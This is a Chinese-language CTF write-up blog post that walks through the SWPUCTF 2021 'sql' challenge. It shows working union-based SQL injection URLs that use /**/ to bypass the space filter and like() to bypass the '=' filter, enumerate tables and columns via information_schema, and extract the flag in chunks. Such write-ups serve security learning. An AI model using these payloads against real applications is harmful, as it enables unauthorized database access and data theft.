[SWPUCTF 2021 新生赛]sql

看到网站上写着参数是wllm,就用wllm=1试了一下,发现是SQL注入

image

查找字段数时,提示请勿非法操作

image

说明空格出现过滤,可以用/**/绕过

http://1.14.71.254:28347/?wllm=1'/**/order/**/by/**/4%23
image

image

发现字段数为3
当进行下一步查询时

http://1.14.71.254:28347/?wllm=-1'union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()%23

又出现错误,看了半天才发现是过滤了= 就使用like代替

http://1.14.71.254:28347/?wllm=-1'union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema/**/like(database())%23

image

http://1.14.71.254:28347/?wllm=-1%27union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name/**/like(%22LTLT_flag%22)%23
image
?wllm=-1'union/**/select/**/1,group_concat(id,flag),3/**/from/**/LTLT_flag%23

发现只有前半截的flag

image

?wllm=-1'union/**/select/**/1,mid(group_concat(id,flag),21,40),3/**/from/**/LTLT_flag%23

image
?wllm=-1'union/**/select/**/1,mid(group_concat(id,flag),41,60),3/**/from/**/LTLT_flag%23

image

将3段flag拼接即可
posted @ 2022-05-15 21:07  traveller-2333  阅读(455)  评论(0编辑  收藏  举报